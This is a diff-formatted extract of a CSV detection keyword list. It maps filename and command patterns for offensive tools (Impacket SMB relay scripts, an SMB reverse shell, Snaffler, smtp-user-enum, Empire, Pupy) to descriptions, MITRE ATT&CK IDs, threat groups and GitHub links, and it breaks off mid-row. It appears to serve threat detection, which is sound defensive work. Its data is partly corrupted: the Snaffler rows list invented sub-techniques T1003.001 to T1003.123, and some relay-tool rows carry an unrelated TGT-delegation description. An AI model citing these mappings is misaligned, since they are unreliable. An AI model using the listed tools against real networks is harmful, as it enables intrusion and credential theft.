+"*SMBRelayResponse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*smbrelayserver.*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
+"*smbrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*smbrelayx.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*smb-reverse-shell.git*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z"
+"*smb-reverse-shell-main*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z"
+"*smbscan*","offensive_tool_keyword","smb-scanner","SMB Scanner tool","T1210.001 - T1190 - T1020 - T1213","TA0007 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/TechnicalMujeeb/smb-scanner","1","1","N/A","N/A","1","45","9","2018-03-30T10:25:18Z","2018-03-29T14:13:20Z"
+"*smb-scanner*","offensive_tool_keyword","smb-scanner","SMB Scanner tool","T1210.001 - T1190 - T1020 - T1213","TA0007 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/TechnicalMujeeb/smb-scanner","1","1","N/A","N/A","1","45","9","2018-03-30T10:25:18Z","2018-03-29T14:13:20Z"
+"*SmbScanner.exe*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - 
TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A",,"N/A",,,
+"*smbserver.py -payload*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*smbserver.py -smb2support EXEGOL*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*smbserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*smbsigning_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*smbspider *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*smbspider.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*smbsr.py*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z"
+"*smicallef/spiderfoot*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A"
+"*SMShell.sln*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. 
Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z"
+"*smtprelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
+"*smtprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*smtp-user-enum * -M EXPN *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*smtp-user-enum * -M RCPT *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*smtp-user-enum * -M VRFY *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*smtp-user-enum*","offensive_tool_keyword","smtp-user-enum","Username guessing tool primarily for use against the default Solaris SMTP service. 
Can use either EXPN - VRFY or RCPT TO.","T1133 - T1110.001","TA0007 - TA0006","N/A","N/A","Credential Access","https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*SnaffCon/Snaffler*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z"
+"*SnaffCore.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - 
T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z"
+"*SnaffCore/ActiveDirectory*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - 
T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z"
+"*SnaffCore/Classifiers*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - 
T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z"
+"*SnaffCore/Concurrency*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - 
T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/Config*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 
- T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/ShareFind*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - 
TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/TreeWalk*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation 
